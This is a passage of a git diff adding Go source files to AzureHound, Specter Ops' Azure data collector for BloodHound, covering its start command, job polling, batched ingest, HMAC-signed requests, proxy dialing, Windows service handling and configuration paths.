Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "github.com/go-logr/logr" + "github.com/spf13/cobra" + + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/constants" +) + +var ( + rootCmd = &cobra.Command{ + Use: constants.Name, + Long: constants.Description, + Version: constants.Version, + } + log logr.Logger +) + +func init() { + config.Init(rootCmd, config.GlobalConfig) +} + +func Execute() error { + return rootCmd.Execute() +} + +func StartService() error { + return startCmd.Execute() +} diff --git a/cmd/start.go b/cmd/start.go new file mode 100644 index 0000000..01e450b --- /dev/null +++ b/cmd/start.go @@ -0,0 +1,439 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "bytes" + "compress/gzip" + "context" + "encoding/json" + "errors" + "fmt" + "io" + "net/http" + "net/url" + "os" + "os/signal" + "runtime" + "sort" + "sync" + "sync/atomic" + "time" + + "github.com/spf13/cobra" + + "github.com/bloodhoundad/azurehound/v2/client/rest" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" +) + +const ( + BHEAuthSignature string = "bhesignature" +) + +var ErrExceededRetryLimit = errors.New("exceeded max retry limit for ingest batch, proceeding with next batch...") + +func init() { + configs := append(config.AzureConfig, config.BloodHoundEnterpriseConfig...) + configs = append(configs, config.CollectionConfig...) + config.Init(startCmd, configs) + rootCmd.AddCommand(startCmd) +} + +var startCmd = &cobra.Command{ + Use: "start", + Short: "Start Azure data collection service for BloodHound Enterprise", + Run: startCmdImpl, + PersistentPreRunE: persistentPreRunE, + SilenceUsage: true, +} + +func startCmdImpl(cmd *cobra.Command, args []string) { + start(cmd.Context()) +} + +func start(ctx context.Context) { + ctx, stop := signal.NotifyContext(ctx, os.Interrupt, os.Kill) + sigChan := make(chan os.Signal) + go func() { + stacktrace := make([]byte, 8192) + for range sigChan { + length := runtime.Stack(stacktrace, true) + fmt.Println(string(stacktrace[:length])) + } + }() + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + if azClient := connectAndCreateClient(); azClient == nil { + exit(fmt.Errorf("azClient is unexpectedly nil")) + } else if bheInstance, err := url.Parse(config.BHEUrl.Value().(string)); err != nil { + exit(fmt.Errorf("unable to parse BHE url: %w", err)) + } else if bheClient, err := newSigningHttpClient(BHEAuthSignature, config.BHETokenId.Value().(string), config.BHEToken.Value().(string), config.Proxy.Value().(string)); err != nil { + exit(fmt.Errorf("failed to create new signing HTTP client: %w", err)) + } else if updatedClient, err := updateClient(ctx, *bheInstance, bheClient); err != nil { + exit(fmt.Errorf("failed to update client: %w", err)) + } else if err := endOrphanedJob(ctx, *bheInstance, bheClient, updatedClient); err != nil { + exit(fmt.Errorf("failed to end orphaned job: %w", err)) + } else { + log.Info("connected successfully! waiting for jobs...") + ticker := time.NewTicker(5 * time.Second) + defer ticker.Stop() + + var ( + jobQueued sync.Mutex + currentJobID atomic.Int64 + ) + + for { + select { + case <-ticker.C: + if jobID := currentJobID.Load(); jobID != 0 { + log.V(1).Info("collection in progress...", "jobId", jobID) + if err := checkin(ctx, *bheInstance, bheClient); err != nil { + log.Error(err, "bloodhound enterprise service checkin failed") + } + } else if jobQueued.TryLock() { + go func() { + defer panicrecovery.PanicRecovery() + defer jobQueued.Unlock() + defer bheClient.CloseIdleConnections() + defer azClient.CloseIdleConnections() + + ctx, stop := context.WithCancel(ctx) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + + log.V(2).Info("checking for available collection jobs") + if jobs, err := getAvailableJobs(ctx, *bheInstance, bheClient); err != nil { + log.Error(err, "unable to fetch available jobs for azurehound") + } else { + // Get only the jobs that have reached their execution time + executableJobs := []models.ClientJob{} + now := time.Now() + for _, job := range jobs { + if job.Status == models.JobStatusReady && job.ExecutionTime.Before(now) || job.ExecutionTime.Equal(now) { + executableJobs = append(executableJobs, job) + } + } + + // Sort jobs in ascending order by execution time + sort.Slice(executableJobs, func(i, j int) bool { + return executableJobs[i].ExecutionTime.Before(executableJobs[j].ExecutionTime) + }) + + if len(executableJobs) == 0 { + log.V(2).Info("there are no jobs for azurehound to complete at this time") + } else { + defer currentJobID.Store(0) + queuedJobID := executableJobs[0].ID + currentJobID.Store(int64(queuedJobID)) + // Notify BHE instance of job start + if err := startJob(ctx, *bheInstance, bheClient, queuedJobID); err != nil { + log.Error(err, "failed to start job, will retry on next heartbeat") + return + } + + start := time.Now() + + // Batch data out for ingestion + stream := listAll(ctx, azClient) + batches := pipeline.Batch(ctx.Done(), stream, config.ColBatchSize.Value().(int), 10*time.Second) + hasIngestErr := ingest(ctx, *bheInstance, bheClient, batches) + + // Notify BHE instance of job end + duration := time.Since(start) + + message := "Collection completed successfully" + if hasIngestErr { + message = "Collection completed with errors during ingest" + } + if err := endJob(ctx, *bheInstance, bheClient, models.JobStatusComplete, message); err != nil { + log.Error(err, "failed to end job") + } else { + log.Info(message, "id", queuedJobID, "duration", duration.String()) + } + } + } + }() + } + case <-ctx.Done(): + return + } + } + } +} + +func ingest(ctx context.Context, bheUrl url.URL, bheClient *http.Client, in <-chan []interface{}) bool { + endpoint := bheUrl.ResolveReference(&url.URL{Path: "/api/v2/ingest"}) + + var ( + hasErrors = false + maxRetries = 3 + unrecoverableErrMsg = fmt.Sprintf("ending current ingest job due to unrecoverable error while requesting %v", endpoint) + ) + + for data := range pipeline.OrDone(ctx.Done(), in) { + var ( + body bytes.Buffer + gw = gzip.NewWriter(&body) + ) + + ingestData := models.IngestRequest{ + Meta: models.Meta{ + Type: "azure", + }, + Data: data, + } + + err := json.NewEncoder(gw).Encode(ingestData) + if err != nil { + log.Error(err, unrecoverableErrMsg) + } + gw.Close() + + if req, err := http.NewRequestWithContext(ctx, "POST", endpoint.String(), &body); err != nil { + log.Error(err, unrecoverableErrMsg) + return true + } else { + req.Header.Set("User-Agent", constants.UserAgent()) + req.Header.Set("Accept", "application/json") + req.Header.Set("Content-Encoding", "gzip") + for retry := 0; retry < maxRetries; retry++ { + // No retries on regular err cases, only on HTTP 504 Gateway Timeout and HTTP 503 Service Unavailable + if response, err := bheClient.Do(req); err != nil { + if rest.IsClosedConnectionErr(err) { + // try again on force closed connection + log.Error(err, fmt.Sprintf("remote host force closed connection while requesting %s; attempt %d/%d; trying again", req.URL, retry+1, maxRetries)) + rest.ExponentialBackoff(retry) + + if retry == maxRetries-1 { + log.Error(ErrExceededRetryLimit, "") + hasErrors = true + } + + continue + } + log.Error(err, unrecoverableErrMsg) + return true + } else if response.StatusCode == http.StatusGatewayTimeout || response.StatusCode == http.StatusServiceUnavailable || response.StatusCode == http.StatusBadGateway { + serverError := fmt.Errorf("received server error %d while requesting %v; attempt %d/%d; trying again", response.StatusCode, endpoint, retry+1, maxRetries) + log.Error(serverError, "") + + rest.ExponentialBackoff(retry) + + if retry == maxRetries-1 { + log.Error(ErrExceededRetryLimit, "") + hasErrors = true + } + if err := response.Body.Close(); err != nil { + log.Error(fmt.Errorf("failed to close ingest body: %w", err), unrecoverableErrMsg) + } + continue + } else if response.StatusCode != http.StatusAccepted { + if bodyBytes, err := io.ReadAll(response.Body); err != nil { + log.Error(fmt.Errorf("received unexpected response code from %v: %s; failure reading response body", endpoint, response.Status), unrecoverableErrMsg) + } else { + log.Error(fmt.Errorf("received unexpected response code from %v: %s %s", req.URL, response.Status, bodyBytes), unrecoverableErrMsg) + } + if err := response.Body.Close(); err != nil { + log.Error(fmt.Errorf("failed to close ingest body: %w", err), unrecoverableErrMsg) + } + return true + } else { + if err := response.Body.Close(); err != nil { + log.Error(fmt.Errorf("failed to close ingest body: %w", err), unrecoverableErrMsg) + } + } + } + } + } + return hasErrors +} + +// TODO: create/use a proper bloodhound client +func do(bheClient *http.Client, req *http.Request) (*http.Response, error) { + var ( + res *http.Response + maxRetries = 3 + ) + + // copy the bytes in case we need to retry the request + if body, err := rest.CopyBody(req); err != nil { + return nil, err + } else { + for retry := 0; retry < maxRetries; retry++ { + // Reusing http.Request requires rewinding the request body + // back to a working state + if body != nil && retry > 0 { + req.Body = io.NopCloser(bytes.NewBuffer(body)) + } + + if res, err = bheClient.Do(req); err != nil { + if rest.IsClosedConnectionErr(err) { + // try again on force closed connections + log.Error(err, fmt.Sprintf("remote host force closed connection while requesting %s; attempt %d/%d; trying again", req.URL, retry+1, maxRetries)) + rest.ExponentialBackoff(retry) + continue + } + // normal client error, dont attempt again + return nil, err + } else if res.StatusCode < http.StatusOK || res.StatusCode >= http.StatusBadRequest { + if res.StatusCode >= http.StatusInternalServerError { + // Internal server error, backoff and try again. + serverError := fmt.Errorf("received server error %d while requesting %v", res.StatusCode, req.URL) + log.Error(serverError, fmt.Sprintf("attempt %d/%d; trying again", retry+1, maxRetries)) + + rest.ExponentialBackoff(retry) + continue + } + // bad request we do not need to retry + var body json.RawMessage + defer res.Body.Close() + if err := json.NewDecoder(res.Body).Decode(&body); err != nil { + return nil, fmt.Errorf("received unexpected response code from %v: %s; failure reading response body", req.URL, res.Status) + } else { + return nil, fmt.Errorf("received unexpected response code from %v: %s %s", req.URL, res.Status, body) + } + } else { + return res, nil + } + } + } + + return nil, fmt.Errorf("unable to complete request to url=%s; attempts=%d;", req.URL, maxRetries) +} + +type basicResponse[T any] struct { + Data T `json:"data"` +} + +func getAvailableJobs(ctx context.Context, bheUrl url.URL, bheClient *http.Client) ([]models.ClientJob, error) { + var ( + endpoint = bheUrl.ResolveReference(&url.URL{Path: "/api/v2/jobs/available"}) + response basicResponse[[]models.ClientJob] + ) + + if req, err := rest.NewRequest(ctx, "GET", endpoint, nil, nil, nil); err != nil { + return nil, err + } else if res, err := do(bheClient, req); err != nil { + return nil, err + } else { + defer res.Body.Close() + if err := json.NewDecoder(res.Body).Decode(&response); err != nil { + return nil, err + } else { + return response.Data, nil + } + } +} + +func checkin(ctx context.Context, bheUrl url.URL, bheClient *http.Client) error { + endpoint := bheUrl.ResolveReference(&url.URL{Path: "/api/v2/jobs/current"}) + + if req, err := rest.NewRequest(ctx, "GET", endpoint, nil, nil, nil); err != nil { + return err + } else if res, err := do(bheClient, req); err != nil { + return err + } else { + res.Body.Close() + return nil + } +} + +func startJob(ctx context.Context, bheUrl url.URL, bheClient *http.Client, jobId int) error { + log.Info("beginning collection job", "id", jobId) + var ( + endpoint = bheUrl.ResolveReference(&url.URL{Path: "/api/v2/jobs/start"}) + body = map[string]int{ + "id": jobId, + } + ) + + if req, err := rest.NewRequest(ctx, "POST", endpoint, body, nil, nil); err != nil { + return err + } else if res, err := do(bheClient, req); err != nil { + return err + } else { + res.Body.Close() + return nil + } +} + +func endJob(ctx context.Context, bheUrl url.URL, bheClient *http.Client, status models.JobStatus, message string) error { + endpoint := bheUrl.ResolveReference(&url.URL{Path: "/api/v2/jobs/end"}) + + body := models.CompleteJobRequest{ + Status: status.String(), + Message: message, + } + + if req, err := rest.NewRequest(ctx, "POST", endpoint, body, nil, nil); err != nil { + return err + } else if res, err := do(bheClient, req); err != nil { + return err + } else { + res.Body.Close() + return nil + } +} + +func updateClient(ctx context.Context, bheUrl url.URL, bheClient *http.Client) (*models.UpdateClientResponse, error) { + var ( + endpoint = bheUrl.ResolveReference(&url.URL{Path: "/api/v2/clients/update"}) + response = basicResponse[models.UpdateClientResponse]{} + ) + if addr, err := dial(bheUrl.String()); err != nil { + return nil, err + } else { + // hostname is nice to have but we don't really need it + hostname, _ := os.Hostname() + + body := models.UpdateClientRequest{ + Address: addr, + Hostname: hostname, + Version: constants.Version, + } + + log.V(2).Info("updating client info", "info", body) + + if req, err := rest.NewRequest(ctx, "PUT", endpoint, body, nil, nil); err != nil { + return nil, err + } else if res, err := do(bheClient, req); err != nil { + return nil, err + } else { + defer res.Body.Close() + if err := json.NewDecoder(res.Body).Decode(&response); err != nil { + return nil, err + } else { + return &response.Data, nil + } + } + } +} + +func endOrphanedJob(ctx context.Context, bheUrl url.URL, bheClient *http.Client, updatedClient *models.UpdateClientResponse) error { + if updatedClient.CurrentJob.Status == models.JobStatusRunning { + log.Info("the service started with an orphaned job in progress, sending job completion notice...", "jobId", updatedClient.CurrentJobID) + return endJob(ctx, bheUrl, bheClient, models.JobStatusFailed, "This job has been orphaned. Re-run collection for complete data.") + } else { + return nil + } +} diff --git a/cmd/svc_windows.go b/cmd/svc_windows.go new file mode 100644 index 0000000..a3109f4 --- /dev/null +++ b/cmd/svc_windows.go @@ -0,0 +1,82 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/logger" + "github.com/judwhite/go-svc" +) + +func StartWindowsService() error { + if err := svc.Run(&azurehoundSvc{}); err != nil { + return err + } else { + return nil + } +} + +type azurehoundSvc struct { + cancel context.CancelFunc +} + +func (s *azurehoundSvc) Init(env svc.Environment) error { + config.LoadValues(nil, config.Options()) + config.SetAzureDefaults() + + if logr, err := logger.GetLogger(); err != nil { + return err + } else { + log = *logr + config.CheckCollectionConfigSanity(log) + + if config.ConfigFileUsed() != "" { + log.V(1).Info(fmt.Sprintf("Config File: %v", config.ConfigFileUsed())) + } + + if config.LogFile.Value() != "" { + log.V(1).Info(fmt.Sprintf("Log File: %v", config.LogFile.Value())) + } + + return nil + } +} + +func (s *azurehoundSvc) Start() error { + if err := s.Stop(); err != nil { + return err + } else { + log.Info("starting azurehound service...", "config", config.ConfigFileUsed()) + ctx, stop := context.WithCancel(context.Background()) + s.cancel = stop + go start(ctx) + return nil + } +} + +func (s *azurehoundSvc) Stop() error { + if s.cancel != nil { + log.Info("stopping azurehound service...") + s.cancel() + s = nil + } + return nil +} diff --git a/cmd/uninstall_windows.go b/cmd/uninstall_windows.go new file mode 100644 index 0000000..a09e747 --- /dev/null +++ b/cmd/uninstall_windows.go @@ -0,0 +1,67 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "fmt" + + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/spf13/cobra" + "golang.org/x/sys/windows/svc/eventlog" + "golang.org/x/sys/windows/svc/mgr" +) + +func init() { + rootCmd.AddCommand(uninstallCmd) +} + +var uninstallCmd = &cobra.Command{ + Use: "uninstall", + Short: "Removes AzureHound as a system service", + Run: uninstallCmdImpl, + PersistentPreRunE: persistentPreRunE, + SilenceUsage: true, +} + +func uninstallCmdImpl(cmd *cobra.Command, args []string) { + if err := uninstallService(constants.Name); err != nil { + exit(fmt.Errorf("failed to uninstall service: %w", err)) + } +} + +func uninstallService(name string) error { + if wsm, err := mgr.Connect(); err != nil { + return err + } else { + defer wsm.Disconnect() + + if service, err := wsm.OpenService(name); err != nil { + return err + } else { + defer service.Close() + + if err := service.Delete(); err != nil { + return err + } else if err := eventlog.Remove(name); err != nil { + return err + } else { + return nil + } + } + } +} diff --git a/cmd/utils.go b/cmd/utils.go new file mode 100644 index 0000000..6d4792a --- /dev/null +++ b/cmd/utils.go @@ -0,0 +1,489 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "bufio" + "bytes" + "context" + "crypto/hmac" + "crypto/sha256" + "crypto/tls" + "encoding/base64" + "fmt" + "io" + "io/fs" + "net" + "net/http" + "net/url" + "os" + "path" + "path/filepath" + "runtime/pprof" + "time" + + "github.com/spf13/cobra" + "golang.org/x/net/proxy" + + "github.com/bloodhoundad/azurehound/v2/client" + client_config "github.com/bloodhoundad/azurehound/v2/client/config" + "github.com/bloodhoundad/azurehound/v2/client/rest" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/logger" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/bloodhoundad/azurehound/v2/sinks" +) + +func exit(err error) { + log.Error(err, "encountered unrecoverable error") + log.GetSink() + os.Exit(1) +} + +func persistentPreRunE(cmd *cobra.Command, args []string) error { + // need to set config flag value explicitly + if cmd != nil { + if configFlag := cmd.Flag(config.ConfigFile.Name).Value.String(); configFlag != "" { + config.ConfigFile.Set(configFlag) + } + } + + config.LoadValues(cmd, config.Options()) + config.SetAzureDefaults() + + if logr, err := logger.GetLogger(); err != nil { + return err + } else { + log = *logr + config.CheckCollectionConfigSanity(log) + + if config.ConfigFileUsed() != "" { + log.V(1).Info(fmt.Sprintf("Config File: %v", config.ConfigFileUsed())) + } + + if config.LogFile.Value() != "" { + log.V(1).Info(fmt.Sprintf("Log File: %v", config.LogFile.Value())) + } + + return nil + } +} + +func gracefulShutdown(stop context.CancelFunc) { + stop() + fmt.Fprintln(os.Stderr, "\nshutting down gracefully, press ctrl+c again to force") + if profile := pprof.Lookup(config.Pprof.Value().(string)); profile != nil { + profile.WriteTo(os.Stderr, 1) + } +} + +func testConnections() error { + if _, err := dial(config.AzAuthUrl.Value().(string)); err != nil { + return fmt.Errorf("unable to connect to %s: %w", config.AzAuthUrl.Value(), err) + } else if _, err := dial(config.AzGraphUrl.Value().(string)); err != nil { + return fmt.Errorf("unable to connect to %s: %w", config.AzGraphUrl.Value(), err) + } else if _, err := dial(config.AzMgmtUrl.Value().(string)); err != nil { + return fmt.Errorf("unable to connect to %s: %w", config.AzMgmtUrl.Value(), err) + } else { + return nil + } +} + +type httpsDialer struct{} + +func (s httpsDialer) Dial(network string, addr string) (net.Conn, error) { + return tls.Dial(network, addr, &tls.Config{}) +} + +func newProxyDialer(url *url.URL, forward proxy.Dialer) (proxy.Dialer, error) { + dialer := &proxyDialer{ + host: url.Host, + forward: forward, + } + + if url.User != nil { + dialer.user = url.User.Username() + dialer.pass, _ = url.User.Password() + } + + return dialer, nil +} + +type proxyDialer struct { + host string + user string + pass string + forward proxy.Dialer +} + +func (s proxyDialer) Dial(network string, addr string) (net.Conn, error) { + if s.forward == nil { + return nil, fmt.Errorf("unable to connect to %s: forward dialer not set", s.host) + } else if conn, err := s.forward.Dial(network, s.host); err != nil { + return nil, fmt.Errorf("unable to connect to %s: %w", s.host, err) + } else if req, err := http.NewRequest("CONNECT", "//"+addr, nil); err != nil { + conn.Close() + return nil, fmt.Errorf("unable to connect to %s: %w", addr, err) + } else { + req.Close = false + if s.user != "" { + req.SetBasicAuth(s.user, s.pass) + } + + // Write request over proxy connection + if err := req.Write(conn); err != nil { + conn.Close() + return nil, fmt.Errorf("unable to connect to %s: %w", addr, err) + } + + res, err := http.ReadResponse(bufio.NewReader(conn), req) + defer func() { + if res.Body != nil { + res.Body.Close() + } + }() + + if err != nil { + conn.Close() + return nil, fmt.Errorf("unable to connect to %s: %w", addr, err) + } else if res.StatusCode != 200 { + if res.Body != nil { + res.Body.Close() + } + conn.Close() + return nil, fmt.Errorf("unable to connect to %s via proxy (%s): statusCode %d", addr, s.host, res.StatusCode) + } else { + return conn, nil + } + } +} + +func getDialer() (proxy.Dialer, error) { + if proxyUrl := config.Proxy.Value().(string); proxyUrl == "" { + return proxy.Direct, nil + } else if url, err := url.Parse(proxyUrl); err != nil { + return nil, err + } else if url.Scheme == "https" { + return proxy.FromURL(url, httpsDialer{}) + } else { + return proxy.FromURL(url, proxy.Direct) + } +} + +func init() { + proxy.RegisterDialerType("http", newProxyDialer) + proxy.RegisterDialerType("https", newProxyDialer) +} + +func dial(targetUrl string) (string, error) { + log.V(2).Info("dialing...", "targetUrl", targetUrl) + if dialer, err := getDialer(); err != nil { + return "", err + } else if url, err := url.Parse(targetUrl); err != nil { + return "", err + } else { + port := url.Port() + + if port == "" { + port = "443" + } + + if conn, err := dialer.Dial("tcp", fmt.Sprintf("%s:%s", url.Hostname(), port)); err != nil { + return "", err + } else { + defer conn.Close() + addr := conn.LocalAddr().(*net.TCPAddr) + return addr.IP.String(), nil + } + } +} + +func newAzureClient() (client.AzureClient, error) { + var ( + certFile = config.AzCert.Value() + keyFile = config.AzKey.Value() + clientCert string + clientKey string + ) + + if file, ok := certFile.(string); ok && file != "" { + if content, err := os.ReadFile(certFile.(string)); err != nil { + return nil, fmt.Errorf("unable to read provided certificate: %w", err) + } else { + clientCert = string(content) + } + } + + if file, ok := keyFile.(string); ok && file != "" { + if content, err := os.ReadFile(keyFile.(string)); err != nil { + return nil, fmt.Errorf("unable to read provided key file: %w", err) + } else { + clientKey = string(content) + } + } + + config := client_config.Config{ + ApplicationId: config.AzAppId.Value().(string), + Authority: config.AzAuthUrl.Value().(string), + ClientSecret: config.AzSecret.Value().(string), + ClientCert: clientCert, + ClientKey: clientKey, + ClientKeyPass: config.AzKeyPass.Value().(string), + Graph: config.AzGraphUrl.Value().(string), + JWT: config.JWT.Value().(string), + Management: config.AzMgmtUrl.Value().(string), + MgmtGroupId: config.AzMgmtGroupId.Value().([]string), + Password: config.AzPassword.Value().(string), + ProxyUrl: config.Proxy.Value().(string), + RefreshToken: config.RefreshToken.Value().(string), + Region: config.AzRegion.Value().(string), + SubscriptionId: config.AzSubId.Value().([]string), + Tenant: config.AzTenant.Value().(string), + Username: config.AzUsername.Value().(string), + } + return client.NewClient(config) +} + +func newSigningHttpClient(signature, tokenId, token, proxyUrl string) (*http.Client, error) { + if client, err := rest.NewHTTPClient(proxyUrl); err != nil { + return nil, err + } else { + client.Transport = signingTransport{ + base: client.Transport, + tokenId: tokenId, + token: token, + signature: signature, + } + return client, nil + } +} + +type rewindableByteReader struct { + data *bytes.Reader +} + +func (s *rewindableByteReader) Read(p []byte) (int, error) { + return s.data.Read(p) +} + +func (s *rewindableByteReader) Close() error { + return nil +} + +func (s *rewindableByteReader) Rewind() (int64, error) { + return s.data.Seek(0, io.SeekStart) +} + +func discard(reader io.Reader) { + io.Copy(io.Discard, reader) +} + +type signingTransport struct { + base http.RoundTripper + tokenId string + token string + signature string +} + +func (s signingTransport) RoundTrip(req *http.Request) (*http.Response, error) { + // The http client may try to call RoundTrip more than once to replay the same request; in which case rewind the request + if rbr, ok := req.Body.(*rewindableByteReader); ok { + if _, err := rbr.Rewind(); err != nil { + return nil, err + } + } + + if req.Header.Get("Signature") == "" { + + // token + digester := hmac.New(sha256.New, []byte(s.token)) + + // path + if _, err := digester.Write([]byte(req.Method + req.URL.Path)); err != nil { + return nil, err + } + + // datetime + datetime := time.Now().Format(time.RFC3339) + digester = hmac.New(sha256.New, digester.Sum(nil)) + // hash the substring of the current datetime excluding minutes, seconds, microseconds and timezone + if _, err := digester.Write([]byte(datetime[:13])); err != nil { + return nil, err + } + + // body + digester = hmac.New(sha256.New, digester.Sum(nil)) + if req.Body != nil { + var ( + body = &bytes.Buffer{} + hashBuf = make([]byte, 64*1024) // 64KB buffer, consider benchmarking and optimizing this value + tee = io.TeeReader(req.Body, body) + ) + + defer req.Body.Close() + defer discard(tee) + defer discard(body) + + for { + numRead, err := tee.Read(hashBuf) + if numRead > 0 { + if _, err := digester.Write(hashBuf[:numRead]); err != nil { + return nil, err + } + } + + // exit loop on EOF or error + if err != nil { + if err != io.EOF { + return nil, err + } + break + } + } + + req.Body = &rewindableByteReader{data: bytes.NewReader(body.Bytes())} + } + + signature := digester.Sum(nil) + + req.Header.Set("Authorization", fmt.Sprintf("%s %s", s.signature, s.tokenId)) + req.Header.Set("RequestDate", datetime) + req.Header.Set("Signature", base64.StdEncoding.EncodeToString(signature)) + } + return s.base.RoundTrip(req) +} + +func contains[T comparable](collection []T, value T) bool { + for _, item := range collection { + if item == value { + return true + } + } + return false +} + +func unique(collection []string) []string { + keys := make(map[string]bool) + list := []string{} + for _, item := range collection { + if _, found := keys[item]; !found { + keys[item] = true + list = append(list, item) + } + } + return list +} + +func stat(path string) (string, fs.FileInfo, error) { + if info, err := os.Stat(path); err == nil { + return path, info, nil + } else { + p := path + ".exe" + info, err := os.Stat(p) + return p, info, err + } +} + +func getExePath() (string, error) { + exe := os.Args[0] + if exePath, err := filepath.Abs(exe); err != nil { + return "", err + } else if path, info, err := stat(exePath); err != nil { + return "", err + } else if info.IsDir() { + return "", fmt.Errorf("%s is a directory", path) + } else { + return path, nil + } +} + +func setupLogger() { + if logger, err := logger.GetLogger(); err != nil { + panic(err) + } else { + log = *logger + } +} + +// deprecated: use azureWrapper instead +type AzureWrapper struct { + Kind enums.Kind `json:"kind"` + Data interface{} `json:"data"` +} + +type azureWrapper[T any] struct { + Kind enums.Kind `json:"kind"` + Data T `json:"data"` +} + +func NewAzureWrapper[T any](kind enums.Kind, data T) azureWrapper[T] { + return azureWrapper[T]{ + Kind: kind, + Data: data, + } +} + +func outputStream[T any](ctx context.Context, stream <-chan T) { + formatted := pipeline.FormatJson(ctx.Done(), stream) + if path := config.OutputFile.Value().(string); path != "" { + if err := sinks.WriteToFile(ctx, path, formatted); err != nil { + exit(fmt.Errorf("failed to write stream to file: %w", err)) + } + } else { + sinks.WriteToConsole(ctx, formatted) + } +} + +func kvRoleAssignmentFilter(roleId string) func(models.KeyVaultRoleAssignment) bool { + return func(ra models.KeyVaultRoleAssignment) bool { + return path.Base(ra.RoleAssignment.Properties.RoleDefinitionId) == roleId + } +} + +func vmRoleAssignmentFilter(roleId string) func(models.VirtualMachineRoleAssignment) bool { + return func(ra models.VirtualMachineRoleAssignment) bool { + return path.Base(ra.RoleAssignment.Properties.RoleDefinitionId) == roleId + } +} + +func rgRoleAssignmentFilter(roleId string) func(models.ResourceGroupRoleAssignment) bool { + return func(ra models.ResourceGroupRoleAssignment) bool { + return path.Base(ra.RoleAssignment.Properties.RoleDefinitionId) == roleId + } +} + +func mgmtGroupRoleAssignmentFilter(roleId string) func(models.ManagementGroupRoleAssignment) bool { + return func(ra models.ManagementGroupRoleAssignment) bool { + return path.Base(ra.RoleAssignment.Properties.RoleDefinitionId) == roleId + } +} + +func connectAndCreateClient() client.AzureClient { + log.V(1).Info("testing connections") + if err := testConnections(); err != nil { + exit(fmt.Errorf("failed to test connections: %w", err)) + } else if azClient, err := newAzureClient(); err != nil { + exit(fmt.Errorf("failed to create new Azure client: %w", err)) + } else { + return azClient + } + + panic("unexpectedly failed to create azClient without error") +} diff --git a/config/config.go b/config/config.go new file mode 100644 index 0000000..dfc506a --- /dev/null +++ b/config/config.go @@ -0,0 +1,372 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package config + +import ( + "fmt" + "os" + "path/filepath" + "runtime" + "strings" + + config "github.com/bloodhoundad/azurehound/v2/config/internal" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" +) + +type Config = config.Config + +var ( + homeDir, _ = os.UserHomeDir() + + // DefaultConfigFile is the path to the default configuration file. + // + // - $HOME/.config/azurehound/config.json (Unix/Darwin) + // - %USERPROFILE%\.config\azurehound\config.json (Windows) + DefaultConfigFile = filepath.Join(homeDir, ".config", "azurehound", "config.json") +) + +func SystemConfigDirs() []string { + prefixes := func() []string { + switch runtime.GOOS { + case "darwin": + return []string{"/Library/Application Support"} + case "linux": + if xdgDirs := os.Getenv("XDG_CONFIG_DIRS"); xdgDirs != "" { + return strings.Split(xdgDirs, ":") + } else { 